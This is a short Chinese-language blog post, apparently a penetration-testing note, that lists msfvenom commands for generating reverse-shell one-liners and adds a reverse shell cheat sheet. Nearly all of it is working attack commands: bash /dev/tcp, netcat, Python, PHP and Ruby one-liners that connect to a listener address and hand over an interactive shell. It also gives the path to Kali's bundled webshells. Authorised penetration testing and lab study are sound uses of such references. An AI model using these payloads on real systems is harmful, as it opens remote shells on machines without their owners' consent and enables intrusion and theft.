该篇记录如何使用Msfvenom生成各种一句话反弹Shell,同时也是Reverse Shell Cheat Sheet.

0x01 Msfvenom

查看所有反弹shell payload:

  • msfvenom --list payload | grep cmd

Bash

生成一句话Reverse shell:

  • msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.102 lport=4444

Reverse shell:

  • 0<&214-;exec 214<>/dev/tcp/192.168.1.102/4444;sh <&214 >&214 2>&214

Netcat shell

生成一句话Reverse shell:

  • msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.102 lport=4444

    • Reverse shell:mkfifo /tmp/npkto; nc 192.168.1.102 4444 0</tmp/npkto | /bin/sh >/tmp/npkto 2>&1; rm /tmp/npkto

Perl

  • msfvenom -p cmd/unix/reverse_perl lhost=192.168.1.102 lport=4444

Python

  • msfvenom -p cmd/unix/reverse_python lhost=192.168.1.102 lport=4444

Powershell

  • msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.102 lport=4444

Ruby

  • msfvenom -p cmd/windows/reverse_ruby lhost=192.168.1.102 lport=4444

PHP

  • msfvenom -p cmd/unix/reverse_php_ssl lhost=192.168.1.102 lport=4444

参考链接

https://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload/

0x02 Reverse Shell Cheat Sheet

Bash

  • bash -i >& /dev/tcp/192.168.0.5/4444 0>&1

Netcat

  • nc -e /bin/sh 192.168.0.5 4444

Python

  • python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

  • php -r '$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

  • ruby -rsocket -e'f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

参考链接:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

0x03 附,Kali WebShell

  • /usr/share/webshells/

最后更新: 2019年05月28日 23:32

原始链接: https://sakuxa.com/2019/05/28/msf系列之msfvenom02/